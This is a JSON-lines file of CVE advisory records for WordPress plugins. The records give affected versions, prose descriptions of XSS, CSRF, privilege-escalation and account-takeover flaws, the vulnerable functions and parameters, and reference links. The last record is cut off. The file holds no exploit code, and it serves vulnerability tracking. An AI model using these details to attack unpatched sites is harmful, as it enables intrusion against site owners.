{"CVE_ID":"CVE-2024-5728","slug":"animated-al-list","versionImpact":"1.0.6","description":"The Animated AL List WordPress plugin through 1.0.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/287c4e8c-9092-4cb9-9642-e4f3d10f46fa\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/287c4e8c-9092-4cb9-9642-e4f3d10f46fa\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9519","slug":"userplus","versionImpact":"2.0","description":"The UserPlus plugin for WordPress is vulnerable to unauthorized modification of data due to an improper capability check on the 'save_metabox_form' function in versions up to, and including, 2.0. This makes it possible for authenticated attackers, with editor-level permissions or above, to update the registration form role to administrator, which leads to privilege escalation.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1148b18d-7af1-41c6-bd7f-1b2d53cb44e6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1148b18d-7af1-41c6-bd7f-1b2d53cb44e6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/userplus\\\/trunk\\\/admin\\\/admin-post-metaboxes.php?rev=1627771#L62\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/userplus\\\/trunk\\\/admin\\\/admin-post-metaboxes.php?rev=1627771#L62\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11290","slug":"member-access","versionImpact":"1.1.6","description":"The Member Access plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.6 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/member-access\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/member-access\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4c7c448-fe9d-496d-84f2-0da8d1e13d64?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4c7c448-fe9d-496d-84f2-0da8d1e13d64?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13390","slug":"admin-form","versionImpact":"1.9.1","description":"The ADFO \u2013 Custom data in admin dashboard plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'adfo_list' shortcode in all versions up to, and including, 1.9.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/admin-form\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/admin-form\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/38537a5e-7e36-4c94-9d27-59a53dada47b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/38537a5e-7e36-4c94-9d27-59a53dada47b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2481","slug":"mediaview","versionImpact":"1.1.2","description":"The MediaView plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018id' parameter in all versions up to, and including, 1.1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mediaview\\\/tags\\\/1.1.2\\\/inc\\\/forms\\\/addMedia.inc.php#L48\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mediaview\\\/tags\\\/1.1.2\\\/inc\\\/forms\\\/addMedia.inc.php#L48\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mediaview\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mediaview\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca2d687f-0358-4642-849b-100bf40cbbf1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca2d687f-0358-4642-849b-100bf40cbbf1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3793","slug":"buddy-press-force-password-change","versionImpact":"0.1","description":"The Buddypress Force Password Change plugin for WordPress is vulnerable to authenticated account takeover due to the plugin not properly validating a user's identity prior to updating their password through the 'bp_force_password_ajax' function in all versions up to, and including, 0.1. This makes it possible for authenticated attackers, with subscriber-level access and above and under certain prerequisites, to change arbitrary user's passwords, including administrators, and leverage that to gain access to their accounts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddy-press-force-password-change\\\/trunk\\\/bp-force-password-change.php#L93\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddy-press-force-password-change\\\/trunk\\\/bp-force-password-change.php#L93\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3048c4c-77b1-4778-a5d0-b532df777d06?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3048c4c-77b1-4778-a5d0-b532df777d06?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5340","slug":"music-player-for-elementor","versionImpact":"2.4.6","description":"The Music Player for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018album_buy_url\u2019 parameter in all versions up to, and including, 2.4.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/music-player-for-elementor\\\/tags\\\/2.4.6\\\/classes\\\/widgets\\\/slide-music-player-free.php#L1205\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/music-player-for-elementor\\\/tags\\\/2.4.6\\\/classes\\\/widgets\\\/slide-music-player-free.php#L1205\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3304812\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3304812\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/music-player-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/music-player-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/193d9625-34ab-497f-987e-5a53ca01e73e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/193d9625-34ab-497f-987e-5a53ca01e73e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5944","slug":"bdthemes-element-pack-lite","versionImpact":"8.0.0","description":"The Element Pack Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018data-caption\u2019 attribute in all versions up to, and including, 8.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/feedback.bdthemes.com\\\/announcements?category=category_6l495r8q\",\"name\":\"https:\\\/\\\/feedback.bdthemes.com\\\/announcements?category=category_6l495r8q\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/uikit\\\/uikit\\\/issues\\\/5162\",\"name\":\"https:\\\/\\\/github.com\\\/uikit\\\/uikit\\\/issues\\\/5162\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/bdt-uikit.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/bdt-uikit.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/custom-gallery\\\/widgets\\\/custom-gallery.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/custom-gallery\\\/widgets\\\/custom-gallery.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/image-accordion\\\/widgets\\\/image-accordion.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/image-accordion\\\/widgets\\\/image-accordion.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/lightbox\\\/widgets\\\/lightbox.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/lightbox\\\/widgets\\\/lightbox.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3319668\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3319668\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bdthemes-element-pack-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bdthemes-element-pack-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee6b1497-ffac-4eb3-baad-36270e419a95?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee6b1497-ffac-4eb3-baad-36270e419a95?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4473","slug":"widget-shortcode","versionImpact":"0.3.5","description":"The Widget Shortcode WordPress plugin through 0.3.5 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5117b2e9-75b5-459a-b22a-b0e1b0744bd3\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5117b2e9-75b5-459a-b22a-b0e1b0744bd3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1928","slug":"wp-fastest-cache","versionImpact":"1.1.2","description":"The WP Fastest Cache plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the wpfc_preload_single_callback function in versions up to, and including, 1.1.2. This makes it possible for authenticated attackers with subscriber-level access to initiate cache creation.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56a90042-a6c0-4487-811b-ced23c97f9f4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56a90042-a6c0-4487-811b-ced23c97f9f4?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3411","slug":"image-map-pro-lite","versionImpact":"1.0.0","description":"The Image Map Pro \u2013 Drag-and-drop Builder for Interactive Images \u2013 Lite plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.0. This is due to missing nonce validation on the ajax_store_save() function. This makes it possible for unauthenticated attackers to modify plugin settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63e108f4-5d9d-4bcf-aef9-aa856f4241ea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63e108f4-5d9d-4bcf-aef9-aa856f4241ea?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-map-pro-lite\\\/trunk\\\/image-map-pro-wordpress-lite.php#L410\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-map-pro-lite\\\/trunk\\\/image-map-pro-wordpress-lite.php#L410\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4293","slug":"wpdm-premium-packages","versionImpact":"5.7.4","description":"The Premium Packages - Sell Digital Products Securely plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 5.7.4 due to insufficient restriction on the 'wpdmpp_update_profile' function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify their user role by supplying the 'profile[role]' parameter during a profile update.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdm-premium-packages\\\/tags\\\/5.7.4\\\/wpdm-premium-packages.php#L1158\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdm-premium-packages\\\/tags\\\/5.7.4\\\/wpdm-premium-packages.php#L1158\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2951917\\\/wpdm-premium-packages#file5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2951917\\\/wpdm-premium-packages#file5\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82137302-60ca-44d5-b087-dc96e2815fca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82137302-60ca-44d5-b087-dc96e2815fca?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0512","slug":"royal-elementor-addons","versionImpact":"1.3.87","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.87. This is due to missing or incorrect nonce validation on the add_to_wishlist function. This makes it possible for unauthenticated attackers to add items to user wishlists via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2ff2954-f494-4cd7-9f29-ee0e8551e339?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2ff2954-f494-4cd7-9f29-ee0e8551e339?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2459","slug":"ux-flat","versionImpact":"4.1","description":"The UX Flat plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'button' shortcode in all versions up to, and including, 4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d93db2c-7baf-42d8-9b4a-be91b27221a7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d93db2c-7baf-42d8-9b4a-be91b27221a7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ux-flat\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ux-flat\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5727","slug":"widget4call","versionImpact":"1.0.7","description":"The Widget4Call WordPress plugin through 1.0.7 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5f677863-2f4f-474f-ba48-f490f9d6e71c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5f677863-2f4f-474f-ba48-f490f9d6e71c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9518","slug":"userplus","versionImpact":"2.0","description":"The UserPlus plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 2.0 due to insufficient restriction on the 'form_actions' and 'userplus_update_user_profile' functions. This makes it possible for unauthenticated attackers to specify their user role by supplying the 'role' parameter during a registration.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2489e649-27f7-4ca0-8655-0957016fa89a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2489e649-27f7-4ca0-8655-0957016fa89a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/userplus\\\/trunk\\\/functions\\\/user-functions.php?rev=1604604#L47\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/userplus\\\/trunk\\\/functions\\\/user-functions.php?rev=1604604#L47\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9686","slug":"order-notification-for-telegram","versionImpact":"1.0.1","description":"The Order Notification for Telegram plugin for WordPress is vulnerable to unauthorized test message sending due to a missing capability check on the 'nktgnfw_send_test_message' function in versions up to, and including, 1.0.1. This makes it possible for unauthenticated attackers to send a test message via the Telegram Bot API to the user configured in the settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c182b4f2-c67b-4e82-a790-6d98946ebf2c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c182b4f2-c67b-4e82-a790-6d98946ebf2c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-notification-for-telegram\\\/tags\\\/1.0.1\\\/inc\\\/admin_ajax.php#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/order-notification-for-telegram\\\/tags\\\/1.0.1\\\/inc\\\/admin_ajax.php#L5\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10527","slug":"spacer","versionImpact":"3.0.7","description":"The Spacer plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the motech_spacer_callback() function in all versions up to, and including, 3.0.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view limited setting information.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/spacer\\\/tags\\\/3.0.7\\\/index.php#L85\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/spacer\\\/tags\\\/3.0.7\\\/index.php#L85\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/112ece28-27ac-4d3c-b302-7acab43390fb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/112ece28-27ac-4d3c-b302-7acab43390fb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11133","slug":"eventer","versionImpact":"3.9.9.4","description":"The Eventer plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'handle_pdf_download_request' function in all versions up to, and including, 3.9.9. This makes it possible for unauthenticated attackers to download event tickets.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/eventer-wordpress-event-manager-plugin\\\/20972534\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/eventer-wordpress-event-manager-plugin\\\/20972534\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d78b823-fdff-41b2-8059-6564e3eb668d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d78b823-fdff-41b2-8059-6564e3eb668d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1315","slug":"iwjob","versionImpact":"3.5.1","description":"The InWave Jobs plugin for WordPress is vulnerable to privilege escalation via password reset in all versions up to, and including, 3.5.1. This is due to the plugin not properly validating a user's identity prior to updating their password. This makes it possible for unauthenticated attackers to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/injob-job-board-wordpress-theme\\\/20322987\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/injob-job-board-wordpress-theme\\\/20322987\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e49c7b2a-5241-4762-b7c9-c33b1ac4a668?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e49c7b2a-5241-4762-b7c9-c33b1ac4a668?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-28928","slug":"are-you-robot-recaptcha","versionImpact":"2.2","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in sureshdsk Are you robot google recaptcha for wordpress allows Reflected XSS. This issue affects Are you robot google recaptcha for wordpress: from n\/a through 2.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/are-you-robot-recaptcha\\\/vulnerability\\\/wordpress-are-you-robot-google-recaptcha-for-wordpress-plugin-2-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/are-you-robot-recaptcha\\\/vulnerability\\\/wordpress-are-you-robot-google-recaptcha-for-wordpress-plugin-2-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3776","slug":"verification-sms-targetsms","versionImpact":"1.5","description":"The Verification SMS with TargetSMS plugin for WordPress is vulnerable to limited Remote Code Execution in all versions up to, and including, 1.5 via the 'targetvr_ajax_handler' function. This is due to a lack of validation on the type of function that can be called. This makes it possible for unauthenticated attackers to execute any callable function on the site, such as phpinfo().","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/verification-sms-targetsms\\\/trunk\\\/inc\\\/ajax.php#L7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/verification-sms-targetsms\\\/trunk\\\/inc\\\/ajax.php#L7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/verification-sms-targetsms\\\/trunk\\\/inc\\\/ajax.php#L9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/verification-sms-targetsms\\\/trunk\\\/inc\\\/ajax.php#L9\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed08d248-7467-4a3b-91a2-4286d91b9c50?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed08d248-7467-4a3b-91a2-4286d91b9c50?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4671","slug":"profile-builder","versionImpact":"3.13.8","description":"The Profile Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's user_meta and compare shortcodes in all versions up to, and including, 3.13.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profile-builder\\\/tags\\\/3.13.8\\\/admin\\\/advanced-settings\\\/includes\\\/shortcodes\\\/compare.php#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profile-builder\\\/tags\\\/3.13.8\\\/admin\\\/advanced-settings\\\/includes\\\/shortcodes\\\/compare.php#L5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profile-builder\\\/tags\\\/3.13.8\\\/admin\\\/advanced-settings\\\/includes\\\/shortcodes\\\/usermeta.php#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profile-builder\\\/tags\\\/3.13.8\\\/admin\\\/advanced-settings\\\/includes\\\/shortcodes\\\/usermeta.php#L5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3304692\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3304692\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/profile-builder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/profile-builder\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/346c9785-0069-40ec-a255-fe2dae30f7a0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/346c9785-0069-40ec-a255-fe2dae30f7a0?s